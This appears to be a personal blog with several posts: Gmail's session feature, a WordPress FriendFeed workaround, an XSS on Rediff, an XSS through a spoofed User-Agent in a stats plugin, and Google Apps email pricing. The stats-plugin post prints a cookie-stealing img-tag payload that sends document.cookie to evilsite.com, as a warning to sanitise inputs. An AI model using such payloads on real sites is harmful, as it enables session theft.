K World

Google introduced a new feature in Gmail service. Gmail now shows last 5 access types and IP addresses which accessed the current account and lets you end sessions from other locations (where you might have hit remember me option)

Seriously, this is one kick ass feature I’ve been looking for in gmail and they’ve done it with a sweet add-on (I never expected the remote sign-off feature) and for this feature, love you Google.

Don’t ask me why I’ve covered my IP address, I’ve no clue why I did that. May be because, I usually find IP addresses and IDs concealed in screenshots.

Friendfeed is a one great service which I’m using from few days/weeks. So, I thought, I will publish my friendfeed on this blog. Well, as usual, I’ve some of my own requirements. Requirement is that I dont want to show it on my sidebar, but I want to dedicate a page for it. So, I need to take json/xml/rss/atom from friendfeed and create html out of it. Obvious is that I’ve to either write a JS to parse it client side or PHP script to parse it server side. PHP was my choice and I needed an option to exec php on single page. There was on plugin named phpexec, but, I wasn’t very comfortable (call it being paranoid) for using that plugin.

So, I used a small work around. I created a page feed.php and added

/*

Template Name: My Friendfeed

*/

Now, my wordpress thinks that its a template and gives me an option of choosing template while creating pages. I created a page but without any content. I wrote all my php logic in feed.php and now wordpress parses the template and gives me required output. Anyway, you can download the code here. You’ve to extract the contents to your theme folder. Btw, You can see it working here.

Well, its a hackjob. It works (only) for me. If you want to do same, you’ve to edit the code according to your needs. It could have been done far more easily, but my stupid host has php4 and I missed many features. And, I’ve had something else in mind (I thought to publish friendfeed I follow, ie., all friends’ feeds) but later changed mind. By the way, if you don’t know what’s friendfeed, it is an aggregator of all 2.0ish services you might be using in a small definition. Check it if you want to know more, you wont be disappointed.

PS: There is absolutely no reason why I haven’t blogged for more than a month. I wasn’t busy. Its just that nothing had happened in my life to blog. Absolutely nothing. Uhmm, wait, I’ve been to Coorg on an adventure trip. Nothing more than that.

Something more free from Rediff ?
Hell Yeah.

Whats that ?
URL redirection service.

Ads ?
Come on, its rediff, there will be Ads.

What makes it different from other URL redirection services ?
Other URL redirection services are created by themselves. Here, even rediff doesn’t know that it got one too !!!

What ?
okay, in clear words, yet another stupid implementation by rediff.

Where ?
here - > http://www.rediff.com/login/inredirect.php?url=http://karteek.selfdabba.com

What does it do ?
Arghh !!! Click on it !! -> K World

Wow. Anything more in it ?
Uhmm, you want more and rediff will never say No. Yeah, it got XSS in it too.

Double Wow. Show me, show me !!
Well, Neither I can tell no. Click this.

Can I use it for anything more ?
Hell, yeah. How about printing your name there on that page ?

Triple Wow. Show me, show me.
Dude, not going to show you this. But, yeah. Will give you a hint. Document.write in Javascript. And you know how to inject javascript into that page

What ? Do I know ?
Fck. Thats why I should have kept a disclaimer on the top that this post aint for everyone. XSS is Cross Site Scripting, where you would just inject javascript in to another site.

Oh. okay. What do I do now ?
Uhmm, how about one fair deal. I will show you all the bugs I/others found in rediff and you stop using it ?

Yeah. I’m in.
Just goto Xssed.com and search for rediff. Lazy guys like me, click this.

Well, its just not funny way, but very funny way. Neither through a HTTP GET nor a HTTP POST. But, it’s through a header. I haven’t read about this method of XSS up to now, but seriously, its silly and common. Usually webmasters read about the traffic of their websites and Referrer, User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to “<script>alert(1)</script>”, and when I saw the stats page after that guess what, my stats plugin wasn’t sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care about looking at your stats (especially in wordpress). One can rather keeping an alert, can keep some thing like this

<img
src=”javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;”
style=visibility:hidden />

The above code will send the cookie to cookie.php page of evilsite.com and the hacker can collect the cookies there using a very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn’t teach you how to use, so, if you really know what you have to do, you must be knowing this page already.

Result, check your stats plugins and make sure that they are sanitizing all the inputs. Just don’t trust them. They can be very dangerous. Finishing yet another episode of “How do THEY do it ?”

[The following information is collected from various sources, believe at your own risk]

Google made it easier for companies to migrate their legacy email systems to Google Apps by offering an Email Migration API. This is what Google tells about their API

The Email Migration API enables you to migrate email from any data source into Google Apps. You can write extraction code which operates against an email server data store, interface protocol, or email client data store, then, using this API, upload the email messages to a target mailbox, specifying the correct labels, date, and status. The Email Migration API supports both end user tools and administrative tools. This API is only available in Google Apps Premier, Education and Partner Editions.

The new migration tool will move emails in any system including Outlook or any type of server to Google Apps (all editions other than the free one)

In releasing the new API, Google appears to understand that any mid- or large-sized company would be reluctant to rip and replace its current e-mail server with another system. However, by allowing a company to run both systems concurrently, Google may have ameliorated a major concern [1]

In order to convince the mid-or large-sized companies, they are currently offering Postini for free, which assures safety. They indeed have proved that Large companies can trust them by making Capgemini their customer.

Google has got complete “army” of tools for Google Apps to fight with Microsoft Exchange or Lotus Domino or any other Email solutions. If you take a look a the Google Apps Solutions page, they listed a solutions category wise which will do your work at some price if you are not willing to invest money in developing something using the APIs released.

A small research on available solutions and cost

Google Apps Premier Edition which includes Gmail (25 Gigabyte-mail-box with IMAP, POP support ), Google Talk, Google Calendar, Google Docs, Page Creator and Start Page, Policy management and message recover by Postini, SSO, Migration, User Provisioning and Management, email gateway support etc., costs $50/user/year.

According to a source, similar services on Microsoft Exchange Hosted Service costs around $23/user/month. Over all, there is a huge cost difference. Big companies might prefer in-house services rather than outsourcing their emails to other hosts. Companies like Accenture and Wipro have migrated a while ago from Lotus Notes to Microsoft Exchange to reduce their cost, enhance security and for some other added advantages. However, I couldn’t get much data on cost-per-user for Exchange and Lotus, but, as per this report, in-house deployment of Exchange will cost around $438 per/user/3Years and IBM’s solution costs $406 per/user/3Years.

These are results. (I’m damn sure that they aren’t correct, but atleast, they might give you an idea. And, cost of in-house solutions are indicated along with hardware and running costs. Software only costs are just the licensing costs) However, the sizes of email boxes are different, Google Apps at 25GB and remaining at less than 500MB or reaching a max of 3.6GB per box.

Apart from some disadvantages, Google Apps looks like a very good option. Good Luck Google. Who could have expected a search engine to start a webmail service give a Gigabyte box, scare every other webmail service provider, slowly convert it into a collaboration suite, offer it to enterprise customers for decent price and scare the companies who are in this business from long time. Well, I’ve done some work which is not quite my type of research. Now, going back to read about those APIs.